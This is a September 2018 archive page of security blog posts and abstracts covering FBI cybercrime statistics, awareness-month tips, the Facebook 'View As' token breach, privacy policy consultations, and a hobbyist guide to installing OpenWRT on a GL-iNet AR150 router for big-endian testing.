Monthly Archives: September 2018

Cyber Safety Begins at Home – Six Top Tips

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.


Information Security


FBI’s Crime Data Explorer: What the Numbers Say about Cybercrime

What do the numbers say about Cybercrime?  Not much.  No one is using them.  

There is a popular quote often mis-attributed to the hero of Total Quality Management, W. Edwards Deming: "If you can't measure it, you can't manage it." It's one of the first things I think about every year when the FBI releases its annual Crime Statistics Report, as it just did for 2017. (The "mis-attributed" is because, for all the times he has been quoted, Deming actually said almost the exact opposite. What he actually said, in "The New Economics," was: "It is wrong to suppose that if you can’t measure it, you can’t manage it – a costly myth.")

Despite being a misquote, I've used it often myself.  There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it.  Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics.  This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases.  Want to test it yourself?  Call your local Police Department and tell them your computer has a virus.  See what happens.

It isn't for lack of law! Every state in the Union has its own computer crime law, and most of them have a category that would be broadly considered "hacking." A quick reference to all 50 states' computer crime laws is here: State Computer Crime Laws - and yet, with a mandate to report hacking to the Department of Justice, almost nobody is doing it.

You may be familiar with the Uniform Crime Report, which attempts to create a standard for measurement of crime data across the nation.  UCR has failed to help us at all with cybercrime, because it focused almost exclusively on eight major crimes reported through the Summary Reporting System (SRS):

murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.

The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer.  Short-cut URL:

To capture other crime types, the Department of Justice has been encouraging the adoption of NIBRS - the National Incident-Based Reporting System.  This system primarily focuses on 52 crime categories, and gathers statistics on several more.  Most importantly for us, it includes several categories of "Fraud Crimes":

  • 2 / 26A / False Pretenses/Swindle/Confidence Game
  • 41 / 26B / Credit Card/ATM Fraud
  • 46 / 26C / Impersonation
  • 12 / 26D / Welfare Fraud
  • 17 / 26E / Wire Fraud
  • 63 / 26F / Identity Theft
  • 64 / 26G / Hacking/Computer Invasion

Unfortunately, despite being endorsed by almost every major law enforcement advocacy group, many states, including my own, are failing to participate.  The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline.
In the just-released 2017 data, out of the 18,855 law enforcement agencies in the United States, 16,207 of them submitted SRS "old-style" UCR data.  Only 7,073 (42%) submitted NIBRS-style data.

Unfortunately, the situation when it comes to cybercrime is even worse.  For SRS-style reporting, all cybercrimes are lumped under "Fraud".  In 2016, SRS reported 10.6 million arrests.  Only 128,531 of these were for "Fraud", of which cybercrime would be only a tiny portion.

Of those seven "fraud type" crimes, the 2017 data is not yet available for detailed analysis.  (Currently, most of the state data sets, released September 26, 2018, limit the data in each table to only 500 rows.  Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3,800 rows of data, you can see how that filter is inadequate for state-wide analysis in fully participating states!)

Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes.  In 2016, 6,191 law enforcement agencies submitted NIBRS-style data.  Of those, 5,074 included at least some "fraud type" crimes.  Here's how they broke down by fraud offense.  Note: these are not the number of CRIMES committed; these are the number of AGENCIES that submitted at least one of these crimes in 2016:

type - # of agencies - fraud type description
 2 - 4,315 agencies - False Pretenses/Swindle/Confidence Game
41 - 3,956 agencies - Credit Card/ATM Fraud
46 - 3,625 agencies - Impersonation
12 -   328 agencies - Welfare Fraud
17 - 1,446 agencies - Wire Fraud
63 -   810 agencies - Identity Theft
64 -   189 agencies - Hacking/Computer Invasion

Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016!  When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion".  To explore on your own, visit the NIBRS 2016 Map.  Then under "Crimes Against Property" choose the Fraud type you would like to explore.  This map shows "Hacking/Computer Invasion."  Where a number shows up instead of a pin, zoom the map to see details for each agency.
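The arithmetic makes the point starkly. A quick sketch using the figures quoted above (the counts are from the NIBRS 2016 breakdown; the percentages are my own calculation):

```python
# Agency counts from the NIBRS 2016 fraud-offense breakdown above.
total_agencies = 18855   # all US law enforcement agencies
nibrs_agencies = 6191    # agencies submitting NIBRS-style data in 2016

fraud_counts = {
    "False Pretenses/Swindle/Confidence Game": 4315,
    "Credit Card/ATM Fraud": 3956,
    "Impersonation": 3625,
    "Welfare Fraud": 328,
    "Wire Fraud": 1446,
    "Identity Theft": 810,
    "Hacking/Computer Invasion": 189,
}

for offense, n in fraud_counts.items():
    pct_all = 100 * n / total_agencies
    pct_nibrs = 100 * n / nibrs_agencies
    print(f"{offense}: {n} agencies "
          f"({pct_all:.1f}% of all agencies, {pct_nibrs:.1f}% of NIBRS agencies)")
```

Hacking/Computer Invasion works out to about 1% of all agencies nationwide, even before asking how many incidents each of those 189 agencies actually logged.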

Filtering the NIBRS 2016 map for "Hacking/Computer Invasion" reports
 As an example, zooming in on the number in Tennessee, I can now see a red pin for Nashville.  When I hover over that pin, it shows me how many crimes in each NIBRS category were reported for 2016, including 107 cases of Wire Fraud, 34 cases of Identity Theft, and only 3 cases of Hacking/Computer Invasion:

Clicking on "Nashville" as an example

I have requested access to the full data set for 2017.  I'll be sure to report here when we have more to share.

Long Term Security Attitudes and Practices Study

What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.

The Ask

We’re launching a long term study of security practitioners to understand how they approach security. Please sign up for our Long Term Security Attitudes and Practices Study here:


A few years ago I was in a customer-facing role at a SaaS company, and my days were filled with answering questions about our security practices. We would give answers that were good and reasonable, but not always what the other side was expecting. These discrepancies stemmed from differing risk tolerances, different contexts, and varying approaches to security and technology.

This led to many conversations with our executive about changes to our security practices. Often the question would arise: “what’s good enough?” and outside of pointing to ISO27001/2 and HIPAA I didn’t have an answer. I couldn’t tell my executive what would reasonably satisfy our customers’ security expectations beyond pointing to the standards. Clearly though “standards compliance” wasn’t the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices, but there was never any consistency in what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).

Since then I’ve moved on from that company (and changed to an internal role), but that experience raised for me a more fundamental set of questions: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.X or are we driven by something else? Do we construct policies that are risk centric? Are we pragmatists or purists? Are we advisers or problem solvers?

These are questions that have stuck with me for a while and I’ve not found academic papers that answer these questions and so we’re starting a community based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.

Study Details

The study will consist of multiple surveys; once we get going we’ll invite you to a new survey every two weeks. Each survey will be a few questions long and should not take more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. You aren’t expected to participate in every survey, although that would be nice; in fact some of the component surveys may not be relevant to you from time to time.

The study will be anonymous; we’ll still collect an email address and track your unique responses but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses which hopefully will allow us to generate insight.
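One common way to do that kind of cross-survey correlation without exposing identities is to key each response set to a keyed hash of the email address. This is only an illustrative sketch (the salt, function names, and storage here are my own assumptions, not the study's actual pipeline):

```python
import hashlib
import hmac

# Hypothetical secret salt, known only to the researchers.
SECRET_SALT = b"study-secret-salt"

def pseudonym(email: str) -> str:
    """Derive a stable pseudonymous ID from an email address.

    The same email always maps to the same ID, so responses can be
    correlated across surveys, but the ID itself does not reveal
    the email address.
    """
    digest = hmac.new(SECRET_SALT, email.lower().encode(), hashlib.sha256)
    return digest.hexdigest()[:16]

# Responses from two different surveys link up via the pseudonym.
survey1 = {pseudonym("alice@example.com"): {"approach": "risk-centric"}}
survey2 = {pseudonym("alice@example.com"): {"style": "pragmatist"}}

pid = pseudonym("alice@example.com")
print(survey1[pid], survey2[pid])
```

The lowercasing step makes the ID robust to capitalization differences between sign-ups, and truncating the digest keeps the identifier short while remaining effectively collision-free at survey scale.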

The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.


Everyone is welcome – sign up here to participate:



The post Long Term Security Attitudes and Practices Study appeared first on Liquidmatrix Security Digest.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day but this month especially, we are linking arms with safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!


  1. Become an NCSAM Champion. The National Cyber Security Alliance (NCSA) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m. ET/noon PT. Learn, connect with other parents and safety pros, and chime in.
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to install a firewall, strengthen your passwords, and make sure your home network is as secure as it can be.
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

Crucial Elements in Law Enforcement against Cybercrime

Technological innovation, globalization, and urbanization have enabled criminals and terrorists to pose a fresh wave of hazards that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience, and efficiency, but also disadvantages, challenges, and threats. The purpose of this paper is to explore crucial elements in combating cybercrime. The paper identifies the following crucial elements: the special perpetrator-victim relationship, time elements, spatial elements, the technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and rapid growth over the past four decades. These elements should be emphasized in the fight against cybercrime. The paper further analyzes the phenomenon of rent-seeking from the exaggeration of insecurity and cybercrime, which can amount to misinformation in this battle.

Reliance on cryptography of cloud computing in Healthcare Information Management, lessons for Ghana Health Service.

Cloud computing is considered the next logical step in emerging technology for resource outsourcing, information sharing in the physician-patient relationship, and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing, in the search for treatments for humanity’s major illnesses, calls for a pragmatic understanding of its security deterrence techniques. Studies in the cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by healthcare administrators. Healthcare data leaked to unauthorized users tarnishes the image of the individual, the healthcare facility, and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies and explores their adoption, utilization, and provision of security strategies. Much emphasis is placed on networks, interfaces, data, virtualization, legal, compliance, and governance as key areas of security challenge in cloud computing. Relevant literature is discussed to highlight prominent findings. The contributions presented provide a practical framework for enhancing security in other disciplines as well.

Challenge of Malware Analysis: Malware obfuscation Techniques

Providing security to computer systems against malware is a major concern. Millions of malware samples are created every day, and worse, new malware is highly sophisticated and very difficult to detect, because malware developers use various obfuscation techniques to hide the actual code or behaviour of the malware. It thereby becomes very hard to analyze malware and extract the information needed to design a malware detection system, because of anti-static and anti-dynamic analysis techniques (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.

A Dynamic Scheme for Secure Searches over Distributed Massive Datasets in Cloud Environment using Searchable Symmetric Encryption Technique

Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable for searching, computation, or analysis. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most existing SSE schemes place restrictions on the size and number of index files to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively larger, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on encrypted data stored in an Amazon EMR cluster. The secure searchable inverted index is created on the fly using the Hadoop MapReduce framework during the search process, significantly eliminating the need to store document-keyword pairs on the server. The scheme allows dynamic updates of the existing index and document collection. Parallel execution of the pre-processing phase reduces processing time at the client. An implementation of our construction is provided, and experimental results validating the efficacy of our scheme are reported.
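For readers unfamiliar with SSE, the core idea (keyword search without revealing keywords to the server) can be sketched in a few lines. This is a deliberately minimal, deterministic-token illustration of the general technique, not the paper's distributed MapReduce construction:

```python
import hashlib
import hmac

KEY = b"client-secret-key"  # held by the client, never sent to the server

def token(keyword: str) -> str:
    # Deterministic search token: the server only ever sees this HMAC,
    # never the plaintext keyword.
    return hmac.new(KEY, keyword.encode(), hashlib.sha256).hexdigest()

# Client-side index build: map search tokens to document IDs.
docs = {1: "cloud data outsourcing", 2: "encrypted keyword search"}
index = {}
for doc_id, text in docs.items():
    for word in text.split():
        index.setdefault(token(word), []).append(doc_id)

# The server stores `index`; given a token, it returns matching IDs
# without learning which keyword was queried.
print(index[token("keyword")])  # -> [2]
```

Real schemes add protections this sketch omits (randomized tokens, hidden access patterns, secure updates), which is exactly the design space the paper works in.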

Mini pwning with GL-iNet AR150

Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi.

Unfortunately, these devices had extraordinarily limited memory (16 megabytes) and even more limited storage (4 megabytes). That's megabytes -- the typical SD card in an RPi is a thousand times larger.

I'm interested in that device for the simple reason that it has a big-endian CPU.

All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian, and Linux can be compiled for either. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte order as Intel. On the other hand, popular file formats and crypto algorithms use big-endian, so there's some efficiency to be gained by going with that choice.
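The byte-order difference is easy to demonstrate on any machine. A quick Python sketch interpreting the same four bytes both ways:

```python
import struct

# The same four bytes read as a 32-bit integer differ by byte order.
data = b"\x01\x02\x03\x04"

big = struct.unpack(">I", data)[0]     # big-endian: most significant byte first
little = struct.unpack("<I", data)[0]  # little-endian: least significant byte first

print(hex(big))     # 0x1020304
print(hex(little))  # 0x4030201
```

A struct written to disk or the network by a little-endian machine and read back naively on a big-endian one gets exactly this kind of silent value scrambling, which is the class of subtle bug described above.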

I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.

The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.

An alternative is the GL-AR150. This is a company that sells commercial WiFi products like the other vendors, but caters to hackers and hobbyists. Recognizing the popularity of that TP-Link device, they essentially made a clone with more stuff: 16 megabytes of storage and 64 megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included pins for a console serial port, connectors for additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.

So this post is about the steps I took to get things working for myself.

The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.

The problem with their Ethernet port is that you have to manually set your IP address. Their address is I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:

# ifconfig eth:1

The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.

I download this using the browser in my Linux VM, then browse to, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.

The device boots back up, this time the default address is going to be, so again I add another virtual interface to my Linux VM with "ifconfig eth:2" in order to communicate with it.

I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.

The problem is OpenWRT's default firewall settings. Something is interfering with accessing the device, and I can't see what from reading the rules, but I'm obviously missing something, so I just go in and nuke the rules. I just click on the "WAN" segment in the firewall management page and click "remove". I don't care about security; I'm not putting this on the open Internet or letting guests access it.

To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.

While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.

I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.

DHCP assigns this (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:

C:\> ssh root@

...because I'm a Windows user and Windows supports ssh now g*dd***it.

OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended their differences and came back together again in the latest version. But this older version still goes by the "LEDE" name.

At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.

The way OpenWRT deals with this is called an "overlay", which uses the same technology as Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.
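Conceptually, this is a standard Linux overlay filesystem mount. A rough illustration of the mechanism (the paths here are hypothetical, not OpenWRT's actual boot-time layout):

```shell
# Illustrative overlayfs mount: the read-only ROM is the lower layer,
# the writable flash (or USB drive) is the upper layer, and the merged
# view is what the system actually runs from. Requires root.
mkdir -p /tmp/lower /tmp/upper /tmp/work /tmp/merged
mount -t overlay overlay \
      -o lowerdir=/tmp/lower,upperdir=/tmp/upper,workdir=/tmp/work \
      /tmp/merged
# Writes into /tmp/merged land in /tmp/upper; /tmp/lower is never modified.
```

Swapping the upper layer for a bigger device, which is what the rest of this post does, changes where writes go without touching the read-only base system.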

What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.

This process is described on OpenWRT's web page here:

It works well -- but only for systems with more than 4 megs. This is what defeated me before: there's not enough space to add the necessary packages. But with 16 megs on this device there is plenty of space.

The first step is to update the package manager, just like on other Linuxes.

# opkg update

When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flashdrive parts.

[    5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform

Following the instructions in the above link, I then install those components:

# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras

Simply installing these packages will cause it to recognize the USB drive in dmesg:

[   10.748961] scsi 0:0:0:0: Direct-Access     Samsung  Flash Drive FIT  1100 PQ: 0 ANSI: 6
[   10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 GiB)
[   10.766689] sd 0:0:0:0: [sda] Write Protect is off
[   10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[   10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[   10.788139]  sda: sda1
[   10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk

At this point, I need to format the drive with ext4. The correct way of doing this is to connect the drive to my Linux VM and format it there, because in these storage-limited environments OpenWRT doesn't have space for such utilities. But with 16 megs that I'm going to overlay soon anyway, I don't care, so I install those utilities.

# opkg install e2fsprogs

Then I do the normal Linux thing to format the drive:

# mkfs.ext4 /dev/sda1

This blows away whatever was already on the drive.

Now we need to copy over the contents of the existing /overlay. We do that with the following:

# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf - 
# umount /mnt

We use tar to copy because, as a backup program, it maintains file permissions and timestamps, so it's better for backup and restore. We don't want to actually create a file, but instead use it in streaming mode. The '-' in one invocation causes it to stream the results to stdout instead of writing a file; the other invocation uses '-' to stream from stdin. Thus, we never create a complete copy of the archive, either in memory or on disk: files are untarred as soon as they are tarred up.

At this point we run a blind incantation I really don't understand. I just did it and it works. The link above has some more text on this, and some things you should check afterwards.

# block detect > /etc/config/fstab; \
   sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
   sed -i s#/mnt/sda1#/overlay# /etc/config/fstab; \
   cat /etc/config/fstab;

At this point, I reboot and log back in. We need to update the package manager again: when we ran it the first time, it skipped packages that couldn't fit in our tiny partition. We update again now, with a huge overlay, to get a list of all the packages.

# opkg update

For example, gcc is something like 50 megabytes, so it wouldn't have fit initially, but now it does. It's the first thing I grab, along with git.

# opkg install gcc make git

Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves:

  • adding line to /etc/passwd
  • adding line to /etc/group
  • using the passwd command to change the password for the account
  • creating a directory for the user
  • chown the user's directory

My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.

I'm missing a git helper for https, so I use the git protocol instead:

$ git clone git://
$ cd masscan

At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64 megabytes of RAM, so it'll run out of memory quickly. Each process needs around 20 megabytes of RAM, so I content myself with two threads:

$ make -j 2

That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.

The final linking step fails. That's because this platform uses different libraries than other Linux versions: the musl library, instead of the glibc you find on the big distros or the uClibc on smaller distros like those you'd find on the Raspberry Pi. This is excellent -- I found my first bug I need to fix.

In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:


#include <stdio.h>

int main(void)
{
    int x = *(int *)"\1\2\3\4";
    printf("0x%08x\n", x);
    return 0;
}
It indeed prints the big-endian result:

0x01020304
The numbers would be reversed if this were little-endian like x86.

Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.

Insecure code cited in Facebook hack impacting nearly 50 million users

On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.

According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.

Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.

In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.

Facebook has reportedly fixed the vulnerability, informed law enforcement of the breach, and temporarily turned off the "View As" feature while it undergoes security checks. Additionally, the company has reset the access tokens of the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year.

CIPL Submits Comments on Draft Indian Data Protection Bill

On September 26, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP submitted formal comments to the Indian Ministry of Electronics and Information Technology on the draft Indian Data Protection Bill 2018 (“Draft Bill”).

CIPL’s comments on the Draft Bill focus on several key issues that are of particular importance for any modern-day data protection law, including increased emphasis on accountability and the risk-based approach to data processing, interoperability with other data protection laws globally, the significance of having a variety of legal bases for processing and not overly relying on consent, the need for extensive and flexible data transfer mechanisms, and the importance of maximizing the effectiveness of the data protection authority.

Specifically, the comments address the following key issues:

  • the Draft Bill’s extraterritorial scope;
  • the standard for anonymization;
  • notice requirements;
  • accountability and the risk-based approach;
  • legal bases for processing, including importance of the reasonable purposes ground;
  • sensitive personal data;
  • children’s data;
  • individual rights;
  • data breach notification;
  • Data Protection Impact Assessments;
  • record-keeping requirements and data audits;
  • Data Protection Officers;
  • the adverse effects of a data localization requirement;
  • cross-border transfers;
  • codes of practice; and
  • the timeline for adoption.

These comments were formed as part of CIPL’s ongoing engagement in India. In January 2018, CIPL responded to the Indian Ministry of Electronics and Information Technology’s public consultation on the White Paper of the Committee of Experts on a Data Protection Framework for India.

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was used by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another bug. Which brings us to today: Facebook revealed this morning that it is dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know whether any personal information was gathered or misused from the affected accounts. As a precaution, however, everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as into any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since affected users were logged out as part of Facebook’s fix, it’s vital you update your login information when you sign back in. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It’s also a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

NTIA Seeks Public Comment on Approach to Consumer Privacy with an Eye Toward Building Better Privacy Protections

On September 26, 2018, the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) announced that it is seeking public comments on a proposed approach to advancing consumer privacy. The approach is divided into two parts:

  • a set of desired user-centric privacy outcomes of organizational practices, including transparency, control, reasonable minimization (of data collection, storage length, use and sharing), security, access and correction, risk management and accountability; and
  • a set of high-level goals that describe the outlines of the ecosystem that should be created to provide those protections, including harmonizing the regulatory landscape, balancing legal clarity and the flexibility to innovate, ensuring comprehensive application, employing a risk- and outcome-based approach, creating mechanisms for interoperability with international norms and frameworks, incentivizing privacy research, ensuring that the Federal Trade Commission has the resources and authority to enforce, and ensuring scalability.

The NTIA is specifically looking to the public to respond with comments on the following questions:

  • Are there other outcomes or goals that should be included, or outcomes or goals that should be expanded upon as separate items?
  • Are the descriptions for the outcomes and goals clear, or are there any issues raised by how any of them are described?
  • Are there any risks that accompany the list of outcomes, the list of goals or the general approach taken?
  • Are there any aspects of the approach that could be implemented or enhanced through Executive action or non-regulatory actions, and if so, what actions?
  • Should further explorations be made regarding additional commercial data privacy-related issues, including any recommended focus and desired outcomes?
  • Are there any aspects of the approach that may be achieved by other means, such as through statutory changes?
  • Do any terms used in the approach require more precise definitions, including suggestions for better definitions and additional terms?
  • Do changes need to be made with regard to the FTC’s resources, processes and/or statutory authority?
  • If all or some of the outcomes or goals described in this approach were replicated by other countries, do you believe it would be easier for U.S. companies to provide goods and services in those countries?
  • Are there other ways to achieve U.S. leadership that are not included in the approach?
  • Are there any high-level goals in this approach that would be detrimental to achieving U.S. leadership?

Comments are due by October 26, 2018, and may be submitted by email. Additional information can be found in the Federal Register Notice.

Senate Commerce Committee Holds Hearing on Examining Consumer Privacy Protections

